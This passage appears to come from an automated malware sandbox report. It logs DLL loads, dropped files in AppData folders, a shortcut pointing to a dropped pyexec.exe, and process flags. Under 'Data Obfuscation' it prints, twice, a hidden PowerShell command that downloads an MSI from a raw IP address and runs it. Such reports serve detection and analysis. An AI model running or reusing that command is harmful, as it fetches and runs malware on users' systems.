          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeSection loaded: pla.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: pla.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msftedit.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: comsvcs.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmlua.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: pla.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
          Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: kleieey.29.drLNK file: ..\..\Roaming\ServiceAlt\pyexec.exe
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeFile opened: C:\Users\user\AppData\Local\Initiate\msvcr90.dllJump to behavior
          Source: Binary string: msvcr90.i386.pdb source: msvcr90.dll.21.dr
          Source: Binary string: wntdll.pdbUGP source: pyexec.exe, 00000015.00000002.2072736317.0000000003C30000.00000004.00000800.00020000.00000000.sdmp, pyexec.exe, 00000015.00000002.2065553931.00000000022FF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: pyexec.exe, 00000015.00000002.2072736317.0000000003C30000.00000004.00000800.00020000.00000000.sdmp, pyexec.exe, 00000015.00000002.2065553931.00000000022FF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\build27\cpython\PCBuild\python27.pdb source: pyexec.exe, 00000015.00000002.2074989941.000000006C69A000.00000002.00000001.01000000.00000007.sdmp, pyexec.exe, 00000015.00000003.2063000404.0000000003FEE000.00000004.00000001.00020000.00000000.sdmp, pyexec.exe, 00000016.00000002.2154631262.000000006C134000.00000002.00000001.01000000.0000000A.sdmp, pyexec.exe, 0000001C.00000002.2290472986.000000006C114000.00000002.00000001.01000000.0000000A.sdmp

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;Jump to behavior
          Source: pyexec.exe.21.drStatic PE information: real checksum: 0x7592 should be: 0x73ad
          Source: pyexec.exe.20.drStatic PE information: real checksum: 0x7592 should be: 0x73ad
          Source: python27.dll.21.drStatic PE information: real checksum: 0x29675c should be: 0x289569
          Source: python27.dll.20.drStatic PE information: real checksum: 0x29675c should be: 0x289569
          Source: msvcr90.dll.20.drStatic PE information: section name: .text entropy: 6.9217598022130655
          Source: msvcr90.dll.21.drStatic PE information: section name: .text entropy: 6.9217598022130655
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Initiate\pyexec.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeFile created: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Initiate\python27.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Initiate\msvcr90.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeFile created: C:\Users\user\AppData\Roaming\ServiceAlt\msvcr90.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeFile created: C:\Users\user\AppData\Roaming\ServiceAlt\python27.dllJump to dropped file
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
